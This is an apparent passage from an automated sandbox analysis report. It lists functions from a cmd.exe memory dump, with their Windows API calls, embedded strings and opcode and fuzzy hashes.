                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                        • String ID:
                                                                                        • API String ID: 1632413811-0
                                                                                        • Opcode ID: af54d9515d0c80802832b3a6e8ed391255d3be8dd4e8ca8ec1333aa2058ab2e7
                                                                                        • Instruction ID: 8e9c5308d5d4d445f5c08f1768c7ca5b2ebaf9ca4d4a584964e4f7ac2cb28b4a
                                                                                        • Opcode Fuzzy Hash: af54d9515d0c80802832b3a6e8ed391255d3be8dd4e8ca8ec1333aa2058ab2e7
                                                                                        • Instruction Fuzzy Hash: E7F074745247019FDB246B74E80A5083B61FB46326B108A59E465D63F5EB79D440CF32
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D89F18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D89F24
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00D8449C,?,?,00000001,?), ref: 00D89F2C
                                                                                        • _get_osfhandle.MSVCRT ref: 00D89F42
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D8449C,?,?,00000001,?), ref: 00D89F4A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1606018815-0
                                                                                        • Opcode ID: dbdd732d737be4995adf747ff39238aa3b6752301c5aa281f6acd7a5a03ad0e4
                                                                                        • Instruction ID: 4a00ab3114b9547694b0e86b1c44509a38442a44ddd6666fb51f644076fd4d6f
                                                                                        • Opcode Fuzzy Hash: dbdd732d737be4995adf747ff39238aa3b6752301c5aa281f6acd7a5a03ad0e4
                                                                                        • Instruction Fuzzy Hash: 5EE01A71504305EBDB009BB4EC0EAAA766CEB05324B140605F529D61D5DBB5D904D632
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6824E
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68256
                                                                                        • _get_osfhandle.MSVCRT ref: 00D68264
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6826C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1606018815-0
                                                                                        • Opcode ID: 0f0b2982b3b8f82b36e0b2e8fa69c1bb33ffdce5931b2d0f10f413d1464d6dcd
                                                                                        • Instruction ID: 830470ddddcae915194cede8754e72c027c6cc0b430a337f4c61a9f72ebeedf8
                                                                                        • Opcode Fuzzy Hash: 0f0b2982b3b8f82b36e0b2e8fa69c1bb33ffdce5931b2d0f10f413d1464d6dcd
                                                                                        • Instruction Fuzzy Hash: 63E0B6B1514300AFDB449BA5FC1DA653B64F70D311B00410AF205C23B4DBB55404CF36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D672C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00D6729C), ref: 00D672CF
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D672D6
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D672DF
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D672E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: ea55f571a77495f1addb3aa4aff49c89c9f8100ef6a7a1c0a420b1fe8209ecea
                                                                                        • Instruction ID: a45962fc99f97e7491e658ea2cf9760ba8c54a7c6d8b6fab4b14db90b95eac54
                                                                                        • Opcode Fuzzy Hash: ea55f571a77495f1addb3aa4aff49c89c9f8100ef6a7a1c0a420b1fe8209ecea
                                                                                        • Instruction Fuzzy Hash: 11D09232505710BBD6913FA8AC0DB863A28EB4A212F010601B205C2260CBB84801DB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                          • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
                                                                                          • Part of subcall function 00D6C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D6C5BD
                                                                                          • Part of subcall function 00D6C570: RtlFreeHeap.NTDLL(00000000), ref: 00D6C5C4
                                                                                          • Part of subcall function 00D6C570: _setjmp3.MSVCRT ref: 00D6C630
                                                                                        • _wcsupr.MSVCRT ref: 00D7C21F
                                                                                          • Part of subcall function 00D71A47: memset.MSVCRT ref: 00D71AE2
                                                                                          • Part of subcall function 00D71A47: ??_V@YAXPAX@Z.MSVCRT ref: 00D71BA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                        • String ID: FOR$ IF
                                                                                        • API String ID: 3818062306-2924197646
                                                                                        • Opcode ID: 0767ad90826353068add7a54b0069222b45646dd26a9a4899c6d6396e9a8c10c
                                                                                        • Instruction ID: 05afb3c5265e6592ff05366faaf704deaa7a3c475b950d4fdc75178b9cb18b96
                                                                                        • Opcode Fuzzy Hash: 0767ad90826353068add7a54b0069222b45646dd26a9a4899c6d6396e9a8c10c
                                                                                        • Instruction Fuzzy Hash: 265134317102025BDB246BB8C86177B72A6EF90754F5C803AE94ACB295FB71DD42CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • wcschr.MSVCRT ref: 00D8BF88
                                                                                        • memcpy.MSVCRT ref: 00D8C008
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcessmemcpywcschr
                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                        • API String ID: 3241892172-381716982
                                                                                        • Opcode ID: 1f6bb09a6e8a2c5aa32db83f312518e86e2f8e84c3bf76d628f4d77705e46b58
                                                                                        • Instruction ID: a3160bedcf25dbdd83353abf689f677602d4f25c3264a927e59b097a37533d11
                                                                                        • Opcode Fuzzy Hash: 1f6bb09a6e8a2c5aa32db83f312518e86e2f8e84c3bf76d628f4d77705e46b58
                                                                                        • Instruction Fuzzy Hash: 36617B71E14215CBCF28EFA8D8906ADBBF1EF48364B24912BE816E7390D77199418F74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6ABC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ABE3
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                          • Part of subcall function 00D6CF10: _setjmp3.MSVCRT ref: 00D6CF28
                                                                                          • Part of subcall function 00D6CF10: iswspace.MSVCRT ref: 00D6CF6B
                                                                                          • Part of subcall function 00D6CF10: wcschr.MSVCRT ref: 00D6CF8D
                                                                                          • Part of subcall function 00D6CF10: iswdigit.MSVCRT ref: 00D6CFEE
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000,00000000,00000002), ref: 00D7CB58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                        • String ID: REM/?
                                                                                        • API String ID: 49548326-4093888634
                                                                                        • Opcode ID: 32e42d85ed8aa8792b1968f516938045a5b60142a3d9b2d4381660d7a7c3a353
                                                                                        • Instruction ID: ec928ead87cc7a46f4b0ec22b06eb7747952f3f02ad60488ff53c50d3d34deca
                                                                                        • Opcode Fuzzy Hash: 32e42d85ed8aa8792b1968f516938045a5b60142a3d9b2d4381660d7a7c3a353
                                                                                        • Instruction Fuzzy Hash: EC31D3327203059BD724EB79A852B3A73A6EF81714F15682FE146DB291EAF1CC008776
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D85679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00D8CD40,0000001C,00D86901), ref: 00D856A8
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00D85778
                                                                                          • Part of subcall function 00D864DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D8650F
                                                                                          • Part of subcall function 00D864DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00), ref: 00D86545
                                                                                          • Part of subcall function 00D864DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86553
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                        • String ID: Software\Classes
                                                                                        • API String ID: 1047774138-1656466771
                                                                                        • Opcode ID: ae4d8fa918aaf679cddcd13adc426e1006a80248bec5d93e1799a924efa1c84f
                                                                                        • Instruction ID: 46570857120bfae726a41ebf9d0c907b60ee03d4447c60db3eae1fe97ddb1dc4
                                                                                        • Opcode Fuzzy Hash: ae4d8fa918aaf679cddcd13adc426e1006a80248bec5d93e1799a924efa1c84f
                                                                                        • Instruction Fuzzy Hash: 5F315075E04714CFDB08BBB8E852AAD77B2EF88710F24802EE006B7295EA755C008B74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D85E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00D8CCE0,0000001C,00D86931), ref: 00D85E32
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00D85EFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$CloseOpeniswspace
                                                                                        • String ID: Software\Classes
                                                                                        • API String ID: 2439148603-1656466771
                                                                                        • Opcode ID: bce119d169e71c73ba32690f92f34964c12b7a2b94efb471533e1c76d6cc5c3b
                                                                                        • Instruction ID: 53ea460ff304c39eea5ca65c6ece908a4e1a1d98d46c3036f1c4b75e0b8f5751
                                                                                        • Opcode Fuzzy Hash: bce119d169e71c73ba32690f92f34964c12b7a2b94efb471533e1c76d6cc5c3b
                                                                                        • Instruction Fuzzy Hash: 45315071E147148FDB09BFA8E852AAD76B1EF48710F24812EF406B7295EA715D008B74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00D6B11F), ref: 00D7CB8B
                                                                                        • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00D7CC2D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleTitle
                                                                                        • String ID: -
                                                                                        • API String ID: 3358957663-3695764949
                                                                                        • Opcode ID: feaf1b3a48131fabb418235d3dd8c894218651934adb611fce2162862cad16fe
                                                                                        • Instruction ID: 97a8b1cb3b8f4bac9bac2932be668f85f5d2ed3471bd9fe8ea17e5e4515368ba
                                                                                        • Opcode Fuzzy Hash: feaf1b3a48131fabb418235d3dd8c894218651934adb611fce2162862cad16fe
                                                                                        • Instruction Fuzzy Hash: 582178317002058BCB19ABACD89577E77A2EBC0300F1D802EE8069B744FA74DD46CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00D7DC57
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                        • API String ID: 2221118986-3416068913
                                                                                        • Opcode ID: 042365f0ab84c3ff389d70697730920368160b31538d1d5b2ad546a624877026
                                                                                        • Instruction ID: 8b91bee1d06f93e88ad581a93213e3dfcc2b782b171014732a168a3ff3b422c5
                                                                                        • Opcode Fuzzy Hash: 042365f0ab84c3ff389d70697730920368160b31538d1d5b2ad546a624877026
                                                                                        • Instruction Fuzzy Hash: 23012475740704ABD7289A389C0AB67B7DACF80310F18852EF85AC7341EEA6FC0082B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6AB7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswspacewcschr
                                                                                        • String ID: =,;
                                                                                        • API String ID: 287713880-1539845467
                                                                                        • Opcode ID: 78b361f6da7a62c938f9f43fe8f460eb9f42fff768c7d99e827e3b52436a747d
                                                                                        • Instruction ID: 7ec976b2430da26c90b42b90caf8e1937ccdfff5a23d703137e973c9ed2a7e5f
                                                                                        • Opcode Fuzzy Hash: 78b361f6da7a62c938f9f43fe8f460eb9f42fff768c7d99e827e3b52436a747d
                                                                                        • Instruction Fuzzy Hash: A5E04F336046229B4A35065DBC18877A29BDFA7B6131E051BF9C4F2254EB618C4089B3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%